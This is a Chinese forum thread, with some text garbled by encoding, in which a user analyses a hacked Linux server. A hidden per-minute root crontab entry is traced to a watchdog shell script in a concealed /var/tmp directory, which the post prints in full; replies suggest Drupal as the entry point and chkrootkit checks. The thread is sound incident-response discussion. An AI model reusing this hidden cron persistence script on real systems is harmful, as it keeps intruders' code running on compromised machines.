幫忙分析一個(gè)linux攻擊

sunowy

今天一個(gè)朋友在聯(lián)通機(jī)房托管的機(jī)器突然訪問不正常，讓我?guī)兔Γ?br /> 開始我也連接不上，后面突然又能連接上了，我檢查了一下命令歷史，沒什么異常
查了secure 日志，發(fā)現(xiàn)在近兩天只有一條記錄，就是剛才我登錄的記錄
然后查了message.log，看到很多如下記錄：

1. Apr 20 10:37:01 localhost crond(pam_unix)[3879]: session opened for user root by (uid=0)
   
2. Apr 20 10:37:01 localhost crond(pam_unix)[3879]: session closed for user root

復(fù)制代碼

知道了它是在crond中做了手機(jī)，看了下crontab，果然有一條不正常的：

1. ~#crontab -l
   
2. * * * * * /var/tmp/.diskid_tmpnode306/.tmp/tempdelete >/dev/null 2>&1

復(fù)制代碼

進(jìn)入/var/tmp/.diskid_tmpnode306/.tmp/這個(gè)目錄，現(xiàn)在以兩個(gè)文件：

1. [root@sym .tmp]# ls
   
2. cyc.pid    tempdelete

復(fù)制代碼

兩個(gè)文件的內(nèi)容分別是：

1. [root@sym .tmp]# cat cyc.pid
   
2. 31364
   

復(fù)制代碼

1. [root@sym .tmp]# cat tempdelete
   
2. #!/bin/sh
   
3. if test -r /var/tmp/.diskid_tmpnode306/.tmp/*.pid; then
   
4. pid=$(cat /var/tmp/.diskid_tmpnode306/.tmp/*.pid)
   
5. if $(kill -CHLD $pid >/dev/null 2>&1)
   
6. then
   
7. exit 0
   
8. fi
   
9. fi
   
10. cd /var/tmp/.diskid_tmpnode306/.tmp/
    
11. ./run &>/dev/null
    

復(fù)制代碼

在/var/tmp/.diskid_tmpnode306/.tmp/ 這個(gè)目錄下，找不到run 這個(gè)文件，
修改crontab應(yīng)該通過這臺(tái)服務(wù)器的web服務(wù)器漏洞進(jìn)行
這個(gè)攻擊的目的是什么呢？找不到run文件，沒法往下分析了，破解root密碼？

linuxdiy

LZ是用的drupal嗎

a.a

先用chkrootkit查一下常用工具如ps ls find 等有沒有被修改，最基本的方法可以用find 看看最近幾天訪問的文件是否有什么異常的，查看一下服務(wù)狀態(tài)、當(dāng)前連接.
要看的東西挺多